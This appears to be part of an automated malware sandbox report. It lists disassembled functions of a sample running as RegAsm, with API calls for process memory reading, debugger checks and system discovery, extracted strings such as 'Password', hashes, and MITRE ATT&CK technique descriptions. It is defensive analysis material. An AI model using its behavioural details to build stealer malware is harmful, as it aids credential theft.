Opcode Fuzzy Hash: 4972614ad764c1221db8638257e897a7011607b395e2648a135fad29f5ce3b62
Instruction Fuzzy Hash: BDF05E75A0020CFBDB24DFA4DC4AFEE7778BB08300F008499BA0597280D6B4AE85CB90

Function 004143F0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetComputerNameA.KERNEL32(?,00000104), ref: 0041441C

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction ID: 2c842b020f3cef85a16e69bd4024725a8e64f23a6ebd0c070df10e7b7a95cf03
Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction Fuzzy Hash: 60E0D8B0A00608FBCB20DFE4DD48FDD77BCAB04301F500055FA05D3240D7749A459B96

Function 004010D0 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualAllocExNuma.KERNEL32(00000000,?,?,004136CC), ref: 004010F2

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocNumaVirtual
String ID:
API String ID: 4233825816-0
Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699

Function 004147B0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 004147BD

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction ID: d87a4f6b3ea3f44bdf221dc5e2fa01f01132d118a4d77551e5f155a4815ada85
Opcode Fuzzy Hash: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction Fuzzy Hash: FAD012B580020C5BD720DBD0ED49AE9B77DBB44204F4049A5EE1492140EBB96AD58AA5

Function 00401060 Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136CC), ref: 00401073

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c95c141f12cd77f44e14c76af6947121bbc7c66554fe0f15bfb2e4a557314363
Instruction ID: 7007e133f31f12fda65ed607deb87b823eabd85472971f09c5db0f2d59686cba
Opcode Fuzzy Hash: c95c141f12cd77f44e14c76af6947121bbc7c66554fe0f15bfb2e4a557314363
Instruction Fuzzy Hash: 5EF0E2B1681208BBE7249AE4AC59FABF7ACA745B05F304459F940E3390DA719E0086A4

Function 00414FE0 Relevance: 1.3, APIs: 1, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00414FE8

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5

Non-executed Functions

Function 00417B3E Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00418E36
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00418E4B
UnhandledExceptionFilter.KERNEL32(0041C690), ref: 00418E56
GetCurrentProcess.KERNEL32(C0000409), ref: 00418E72
TerminateProcess.KERNEL32(00000000), ref: 00418E79

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
Instruction ID: 626787d168731620c5210256d5346bf412deda10741072a35835fd3c0854b49a
Opcode Fuzzy Hash: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
Instruction Fuzzy Hash: 7521C274A01304EFC721EF54F944B843BB4FB8C309F91907AE64887260E7B45A868F9D

Function 0041951A Relevance: 129.2, APIs: 86, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041952E

Part of subcall function 00417237: HeapFree.KERNEL32(00000000,00000000,?,00417148,00000000,00421AC0,0041718F,?,?,?,004171FF,00421AC0,?,?,00419FC3,00421AC0), ref: 0041724D
Part of subcall function 00417237: GetLastError.KERNEL32(?,?,00417148,00000000,00421AC0,0041718F,?,?,?,004171FF,00421AC0,?,?,00419FC3,00421AC0), ref: 0041725F

_free.LIBCMT ref: 00419536
_free.LIBCMT ref: 0041953E
_free.LIBCMT ref: 00419546
_free.LIBCMT ref: 0041954E
_free.LIBCMT ref: 00419556
_free.LIBCMT ref: 0041955D
_free.LIBCMT ref: 00419565
_free.LIBCMT ref: 0041956D
_free.LIBCMT ref: 00419575
_free.LIBCMT ref: 0041957D
_free.LIBCMT ref: 00419585
_free.LIBCMT ref: 0041958D
_free.LIBCMT ref: 00419595
_free.LIBCMT ref: 0041959D
_free.LIBCMT ref: 004195A5
_free.LIBCMT ref: 004195B0
_free.LIBCMT ref: 004195B8
_free.LIBCMT ref: 004195C0
_free.LIBCMT ref: 004195C8
_free.LIBCMT ref: 004195D0
_free.LIBCMT ref: 004195D8
_free.LIBCMT ref: 004195E0
_free.LIBCMT ref: 004195E8
_free.LIBCMT ref: 004195F0
_free.LIBCMT ref: 004195F8
_free.LIBCMT ref: 00419600
_free.LIBCMT ref: 00419608
_free.LIBCMT ref: 00419610
_free.LIBCMT ref: 00419618
_free.LIBCMT ref: 00419620
_free.LIBCMT ref: 00419628
_free.LIBCMT ref: 00419636
_free.LIBCMT ref: 00419641
_free.LIBCMT ref: 0041964C
_free.LIBCMT ref: 00419657
_free.LIBCMT ref: 00419662
_free.LIBCMT ref: 0041966D
_free.LIBCMT ref: 00419678
_free.LIBCMT ref: 00419683
_free.LIBCMT ref: 0041968E
_free.LIBCMT ref: 00419699
_free.LIBCMT ref: 004196A4
_free.LIBCMT ref: 004196AF
_free.LIBCMT ref: 004196BA
_free.LIBCMT ref: 004196C5
_free.LIBCMT ref: 004196D0
_free.LIBCMT ref: 004196DB
_free.LIBCMT ref: 004196E9
_free.LIBCMT ref: 004196F4
_free.LIBCMT ref: 004196FF
_free.LIBCMT ref: 0041970A
_free.LIBCMT ref: 00419715
_free.LIBCMT ref: 00419720
_free.LIBCMT ref: 0041972B
_free.LIBCMT ref: 00419736
_free.LIBCMT ref: 00419741
_free.LIBCMT ref: 0041974C
_free.LIBCMT ref: 00419757
_free.LIBCMT ref: 00419762
_free.LIBCMT ref: 0041976D
_free.LIBCMT ref: 00419778
_free.LIBCMT ref: 00419783
_free.LIBCMT ref: 0041978E
_free.LIBCMT ref: 0041979C
_free.LIBCMT ref: 004197A7
_free.LIBCMT ref: 004197B2
_free.LIBCMT ref: 004197BD
_free.LIBCMT ref: 004197C8
_free.LIBCMT ref: 004197D3
_free.LIBCMT ref: 004197DE
_free.LIBCMT ref: 004197E9
_free.LIBCMT ref: 004197F4
_free.LIBCMT ref: 004197FF
_free.LIBCMT ref: 0041980A
_free.LIBCMT ref: 00419815
_free.LIBCMT ref: 00419820
_free.LIBCMT ref: 0041982B
_free.LIBCMT ref: 00419836
_free.LIBCMT ref: 00419841
_free.LIBCMT ref: 0041984F
_free.LIBCMT ref: 0041985A
_free.LIBCMT ref: 00419865
_free.LIBCMT ref: 00419870
_free.LIBCMT ref: 0041987B
_free.LIBCMT ref: 00419886

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
Instruction ID: aae2e700be17e184457e810537fb88098c042b50a614172b41a0f8a62edf0b60
Opcode Fuzzy Hash: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
Instruction Fuzzy Hash: 9171E531414B009BDF623B32DF43AD976B27F18344F10495EB1D6207329A3668E79ADA

Function 00418833 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041883F

Part of subcall function 00417B1C: __getptd_noexit.LIBCMT ref: 00417B1F
Part of subcall function 00417B1C: __amsg_exit.LIBCMT ref: 00417B2C

__amsg_exit.LIBCMT ref: 0041885F
__lock.LIBCMT ref: 0041886F
InterlockedDecrement.KERNEL32(?), ref: 0041888C
_free.LIBCMT ref: 0041889F
InterlockedIncrement.KERNEL32(00423530), ref: 004188B7

Strings

05B, xrefs: 004188A5, 004188AD

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID: 05B
API String ID: 3470314060-3788103304
Opcode ID: cb1538446801220004b0e94d2aebbf41e1672ae537431284a663a37179733970
Instruction ID: 8a8ff1ff8dd628b75e6676bba0e38f14c3080b60ac14754e1ce274a1fb0e50c0
Opcode Fuzzy Hash: cb1538446801220004b0e94d2aebbf41e1672ae537431284a663a37179733970
Instruction Fuzzy Hash: 8A018B31A05A21ABD720BF6A98057CA7770AF05725F90402FF414A7390CB3C69C2CBED

Function 00411650 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 237COMMON

Download Yara Rule

Strings

%s\%s, xrefs: 00411714
%s%s, xrefs: 00411838
%s\%s\%s, xrefs: 004117DB
%s\*, xrefs: 0041165D
%s\%s, xrefs: 004117FD

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 0-2524465048
Opcode ID: 947076fad2cf54138fd805df56321dbce170cff15bf9f083ea92bf5efec8b8da
Instruction ID: 12845b40676a5aa3371525b3464884def2f62e70e2391475562b270894769044
Opcode Fuzzy Hash: 947076fad2cf54138fd805df56321dbce170cff15bf9f083ea92bf5efec8b8da
Instruction Fuzzy Hash: 949172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5

Function 00413BB0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00413BCF
??_U@YAPAXI@Z.MSVCRT ref: 00413BFD

Part of subcall function 00413880: strlen.MSVCRT ref: 00413891
Part of subcall function 00413880: strlen.MSVCRT ref: 004138B5

VirtualQueryEx.KERNEL32(00413FBD,00000000,?,0000001C), ref: 00413C42
??_V@YAXPAX@Z.MSVCRT ref: 00413D63

Part of subcall function 00413A90: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00413AA8

Strings

@, xrefs: 00413C56
J>A, xrefs: 00413C28, 00413C2B

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @$J>A
API String ID: 2950663791-2358441296
Opcode ID: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
Instruction ID: 2c2b7d9f245a32a2bbb291d0d988364c34d916a4f586dc58851a7281d34e25e1
Opcode Fuzzy Hash: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
Instruction Fuzzy Hash: 1151F9B5E04109AFDB04CF98E981AEFB7B5FF88305F148119F919A7340D738AA51CBA5

Function 00413D80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00413D8E
OpenProcess.KERNEL32(001FFFFF,00000000,00413FBD,0041D28B), ref: 00413DCC
memset.MSVCRT ref: 00413E1A
??_V@YAXPAX@Z.MSVCRT ref: 00413F6E

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00413E3C

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenProcessmemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 1606381396-4138519520
Opcode ID: 8f7e04e399dcd96785ceb1716b110f13538a1c325544ca029cee708869bab16f
Instruction ID: d856183ab5fe66680530eae45f61eeb2e09e8ebe4f945000bbbdd5294c41c952
Opcode Fuzzy Hash: 8f7e04e399dcd96785ceb1716b110f13538a1c325544ca029cee708869bab16f
Instruction Fuzzy Hash: 41513DB0D002189BDB24EF95DC55BEEB775AF48305F1041AEE21966281EB386BC9CF5C

Function 00417B90 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00417B9E

Part of subcall function 00417631: __mtinitlocknum.LIBCMT ref: 00417647
Part of subcall function 00417631: __amsg_exit.LIBCMT ref: 00417653
Part of subcall function 00417631: EnterCriticalSection.KERNEL32(00000000,00000000,?,00417A39,0000000D,?,?,004173BF,0041725D,?,?,00417148,00000000,00421AC0,0041718F), ref: 0041765B

DecodePointer.KERNEL32(004219C8,00000020,00417CE1,00000000,00000001,00000000,?,00417D03,000000FF,?,00417658,00000011,00000000,?,00417A39,0000000D), ref: 00417BDA
DecodePointer.KERNEL32(?,00417D03,000000FF,?,00417658,00000011,00000000,?,00417A39,0000000D,?,?,004173BF,0041725D), ref: 00417BEB

Part of subcall function 004179B2: EncodePointer.KERNEL32(00000000,004191A2,00423DC8,00000314,00000000,?,?,?,?,?,00417EF8,00423DC8,Microsoft Visual C++ Runtime Library,00012010), ref: 004179B4

DecodePointer.KERNEL32(-00000004,?,00417D03,000000FF,?,00417658,00000011,00000000,?,00417A39,0000000D,?,?,004173BF,0041725D), ref: 00417C11
DecodePointer.KERNEL32(?,00417D03,000000FF,?,00417658,00000011,00000000,?,00417A39,0000000D,?,?,004173BF,0041725D), ref: 00417C24
DecodePointer.KERNEL32(?,00417D03,000000FF,?,00417658,00000011,00000000,?,00417A39,0000000D,?,?,004173BF,0041725D), ref: 00417C2E

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: 6a1b6e47f482ee4f200ebd968e601a8bdb3106e7e8c25533cbe6d2efabcc28cd
Instruction ID: b9c8b2f96160ecdabd92ea4e5bd0937b40f29049af89a69b09543e17fed8e61c
Opcode Fuzzy Hash: 6a1b6e47f482ee4f200ebd968e601a8bdb3106e7e8c25533cbe6d2efabcc28cd
Instruction Fuzzy Hash: 26312A70A58349DBDF50AFA9D9856DDBAF1BB48314F10802BE011A7290EB7C49C5CFAD

Function 00418597 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004185A3

Part of subcall function 00417B1C: __getptd_noexit.LIBCMT ref: 00417B1F
Part of subcall function 00417B1C: __amsg_exit.LIBCMT ref: 00417B2C

__getptd.LIBCMT ref: 004185BA
__amsg_exit.LIBCMT ref: 004185C8
__lock.LIBCMT ref: 004185D8
__updatetlocinfoEx_nolock.LIBCMT ref: 004185EC

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: ce05a91ea9c2b8e711ac95fae42e6a284d9b9390d13ac8f67e08820a18d7d66a
Instruction ID: 338c377bce1c7a9efd4d484f1117eb7db12e02c2a0b9313318adb6f265fd4ce4
Opcode Fuzzy Hash: ce05a91ea9c2b8e711ac95fae42e6a284d9b9390d13ac8f67e08820a18d7d66a
Instruction Fuzzy Hash: 93F09032B08610ABD721BB7A98027CE33F1AF00769F10411FF404A72D2CF6C59C28AAD

Function 00406FA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00406CA0: memset.MSVCRT ref: 00406CE4

task.LIBCPMTD ref: 004070CB

Strings

h0A, xrefs: 00406FA6, 00406FA9
`v@, xrefs: 00406FAF, 004070C8, 00406FFE, 00407034, 0040707C, 00407045, 00406FB2
: , xrefs: 0040701E

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memsettask
String ID: : $`v@$h0A
API String ID: 1616412766-3559972273
Opcode ID: b110a5f882e4c5a29bf98c0b26290479d731ff46cf35d9bc55d2f5af67c212e6
Instruction ID: ada0d3b2417df4f6846db9339ab613cf5d00d3a4ed846f7f4b54700126e1e96c
Opcode Fuzzy Hash: b110a5f882e4c5a29bf98c0b26290479d731ff46cf35d9bc55d2f5af67c212e6
Instruction Fuzzy Hash: 17318271E05505ABCB14EBA0DD99EFF7B75BF44305B104529E1027B290CA38BD46CB99

Function 004097F0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0040980B
memset.MSVCRT ref: 0040983E

Strings

@, xrefs: 00409847
v10, xrefs: 00409802

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memcmpmemset
String ID: @$v10
API String ID: 1065087418-24753345
Opcode ID: a53c84bba06c8cdd3019bcb265b07c233e4d1577d2609d9ba9543f3376b72234
Instruction ID: 5b3d9ec4168dab03ff65f300ab0e06bcbae31aa4be8ef5f0a2caa302df57b541
Opcode Fuzzy Hash: a53c84bba06c8cdd3019bcb265b07c233e4d1577d2609d9ba9543f3376b72234
Instruction Fuzzy Hash: 1F412DB1A00208EBDB04DFA9DC55FDE7BB5BF44304F108119F509AB295DB78AE85CB98

Function 00406CA0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406CE4
task.LIBCPMTD ref: 00406F25

Part of subcall function 00408C20: vsprintf_s.MSVCRT ref: 00408C3B

Strings

Password, xrefs: 00406DD1

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memsettaskvsprintf_s
String ID: Password
API String ID: 2675463923-3434357891
Opcode ID: 75c0f30d054459862904669a7d04ac4a3cc8e9706f9eb75124a63882ca205585
Instruction ID: 0ad9f3576bb839c08245877bd66ebcfd5eb6d9c828a80bd0f24b882ad872d544
Opcode Fuzzy Hash: 75c0f30d054459862904669a7d04ac4a3cc8e9706f9eb75124a63882ca205585
Instruction Fuzzy Hash: F6613FB5D042589BDB24DB50CC45BDAB7B8BF44304F0081EAE64AA6281DF746FC9CF95

Function 0040FAE0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0040FB28
strtok_s.MSVCRT ref: 0040FCB2

Strings

block, xrefs: 0040FAF7

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID: block
API String ID: 3330995566-2199623458
Opcode ID: b06fef1e855a6cf9dc2803884fb10180114094499aff9902e63ee450693c05b6
Instruction ID: fe90223f0fd98bde3d1d80b461b3a127632e2556fe5f68b7592fa42a65583c7e
Opcode Fuzzy Hash: b06fef1e855a6cf9dc2803884fb10180114094499aff9902e63ee450693c05b6
Instruction Fuzzy Hash: 16514074A08209EFDB20DFA1D955BAE77B5BF44305F10807AE802B72C0D778E985CB69

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

